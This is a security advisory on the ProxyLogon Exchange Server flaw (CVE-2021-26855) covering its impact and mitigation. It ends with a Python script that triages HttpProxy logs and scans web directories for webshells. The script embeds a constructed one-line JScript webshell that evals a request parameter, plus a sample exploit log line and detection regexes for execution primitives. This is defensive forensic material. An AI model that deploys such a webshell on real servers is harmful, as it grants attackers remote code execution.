This category includes all kinds of intrusions, virtual or physical.

Exchange Webshell (CVE-2021-26855)


On March 2, 2021, Microsoft released out-of-band security updates for its email server software Microsoft Exchange Server that fixed several vulnerabilities which were already being actively exploited in the wild.[0] The entry point of that exploit chain, CVE-2021-26855 (better known as ProxyLogon), is a server-side request forgery that lets an unauthenticated attacker send requests the server treats as authenticated; chained with the other patched bugs it yields arbitrary file writes and code execution. Attackers quickly started installing webshells on every vulnerable installation reachable from the public Internet, giving themselves a persistent backdoor through which they could return later and take further steps.


  • Attackers have access to your Exchange server, can run arbitrary code on it with the privileges of the Exchange services (SYSTEM), read or exfiltrate mailboxes and change the underlying operating system at will.
  • If your internal network, or parts of it, can be reached from your Exchange server, attackers can move further into your network and take additional steps such as dumping credentials, installing ransomware or stealing data.


  • Install Microsoft's security updates for your Exchange version. If you cannot patch immediately, run Microsoft's Exchange On-premises Mitigation Tool (EOMT): it applies an IIS URL Rewrite rule that blocks the CVE-2021-26855 request pattern, runs the Microsoft Safety Scanner and removes any webshells Microsoft can detect. EOMT is an interim mitigation, not a replacement for patching.
  • As Microsoft can obviously only remove webshells it knows about, it is strongly recommended to manually check your Exchange server for other signs of an intrusion by means of a forensic analysis: Microsoft's Test-ProxyLogon.ps1 script checks the Exchange logs for the published indicators, and the IIS and HttpProxy logs, file timestamps in the web directories, newly created accounts and scheduled tasks should be reviewed as well. Since a removed webshell says nothing about what else the attacker did, preserve the evidence and consider rebuilding the server. If you have any indication that the attackers also accessed your internal network, implement network monitoring to confirm or dismiss this and act accordingly.
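The following script is an added example of the manual check described above; it is not part of this page's sources nor one of Microsoft's tools. It works on copies of the Exchange HttpProxy logs taken off the server and implements the indicator Microsoft published for CVE-2021-26855 (an unauthenticated request whose AnchorMailbox looks like "ServerInfo~*/*"), and it scores .aspx files in the directories where ProxyLogon webshells were commonly dropped. The log excerpt, the webshell and the "legitimate page" below are constructed samples; the trait patterns are heuristics chosen for this example, not a definitive signature set.

```python
"""Offline triage for ProxyLogon (CVE-2021-26855) indicators (added example).

Parses copies of Exchange HttpProxy logs for the unauthenticated 'ServerInfo~*/*'
anchor pattern Microsoft published, and scores script files for webshell traits.
All sample inputs below are constructed, not real evidence.
"""
import csv
import os
import re
from dataclasses import dataclass
from typing import List

# Constructed sample of an Exchange HttpProxy log (default location on the server:
# C:\Program Files\Microsoft\Exchange Server\V15\Logging\HttpProxy). Real logs carry
# many more columns; the '#Fields:' header format is the same.
SAMPLE_HTTPPROXY_LOG = """#Software: Microsoft Exchange Server
#Log-type: HttpProxy Logs
#Fields: DateTime,ClientIpAddress,UrlStem,AuthenticatedUser,AnchorMailbox,HttpStatus
2021-03-03T10:12:01.123Z,198.51.100.23,/ecp/y.js,,ServerInfo~a]@mail.example.com:444/ecp/proxyLogon.ecp,200
2021-03-03T10:12:02.456Z,203.0.113.7,/owa/auth/logon.aspx,,,200
2021-03-03T10:13:05.789Z,192.0.2.10,/ecp/default.aspx,EXAMPLE\\alice,ServerInfo~mail.example.com,200
"""

# Constructed one-line JScript webshell (modelled on the widely reported ones) and a
# constructed harmless logon page fragment, used to show the scoring.
SAMPLE_WEBSHELL = ('<script language="JScript" runat="server">'
                   'function Page_Load(){eval(Request["cmd"],"unsafe");}</script>')
SAMPLE_LEGIT_PAGE = ('<%@ Page Language="C#" %>\n<form id="logonForm" runat="server">\n'
                     '<input type="hidden" name="destination" '
                     'value="<%= Request.QueryString["url"] %>" />\n</form>\n')

# Directories Microsoft listed as common webshell drop locations for this campaign.
DEFAULT_WEB_ROOTS = [
    r"C:\inetpub\wwwroot\aspnet_client",
    r"C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth",
    r"C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\ecp\auth",
]


@dataclass
class Finding:
    source: str   # client IP for log hits, file path for webshell hits
    detail: str


def parse_httpproxy_log(text: str) -> List[dict]:
    """Parse an HttpProxy log: the '#Fields:' line names the CSV columns that follow."""
    fields, rows = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = [f.strip() for f in line[len("#Fields:"):].split(",")]
            continue
        if line.startswith("#") or not line.strip():
            continue
        if fields is None:
            raise ValueError("data row before #Fields header")
        rows.append(dict(zip(fields, next(csv.reader([line])))))
    return rows


def find_proxylogon_requests(text: str) -> List[Finding]:
    """Microsoft's indicator: no authenticated user, AnchorMailbox like 'ServerInfo~*/*'."""
    hits = []
    for row in parse_httpproxy_log(text):
        anchor = row.get("AnchorMailbox", "")
        if row.get("AuthenticatedUser", "") == "" and anchor.startswith("ServerInfo~") and "/" in anchor:
            hits.append(Finding(row.get("ClientIpAddress", "?"),
                                f"{row.get('DateTime')} {row.get('UrlStem')} anchor={anchor}"))
    return hits


# Heuristic traits of ASP.NET webshells; each is harmless on its own, together they are not.
WEBSHELL_TRAITS = {
    "server-side script": re.compile(r'runat\s*=\s*["\']server["\']', re.I),
    "request parameter": re.compile(r'\bRequest\s*(?:\.Item)?\s*\[', re.I),
    "execution primitive": re.compile(
        r'\beval\s*\(|"unsafe"|Process\.Start|ProcessStartInfo|cmd\.exe|Assembly\.Load', re.I),
}


def webshell_traits(content: str) -> List[str]:
    return [name for name, rx in WEBSHELL_TRAITS.items() if rx.search(content)]


def looks_like_webshell(content: str) -> bool:
    # One trait is common in legitimate pages (owa\auth ships real .aspx files);
    # two or more deserve a human look.
    return len(webshell_traits(content)) >= 2


def scan_web_roots(roots: List[str]) -> List[Finding]:
    """Walk the drop directories and flag script files with two or more traits."""
    findings = []
    for root in roots:
        for dirpath, _dirs, files in os.walk(root):
            for name in files:
                if not name.lower().endswith((".aspx", ".ashx", ".asmx")):
                    continue
                path = os.path.join(dirpath, name)
                try:
                    with open(path, encoding="utf-8", errors="replace") as fh:
                        traits = webshell_traits(fh.read())
                except OSError:
                    continue
                if len(traits) >= 2:
                    findings.append(Finding(path, ", ".join(traits)))
    return findings


if __name__ == "__main__":
    for f in find_proxylogon_requests(SAMPLE_HTTPPROXY_LOG):
        print(f"[HttpProxy] {f.source}: {f.detail}")
    for f in scan_web_roots(DEFAULT_WEB_ROOTS):
        print(f"[webshell?] {f.source}: {f.detail}")
```

A hit from find_proxylogon_requests tells you the exploit was attempted from that address at that time, which is the pivot point for the rest of the investigation (IIS logs around that timestamp, files created in the web roots shortly afterwards, process creation on the server). A clean result from the webshell scan only means no file matched these heuristics; it does not rule out other persistence.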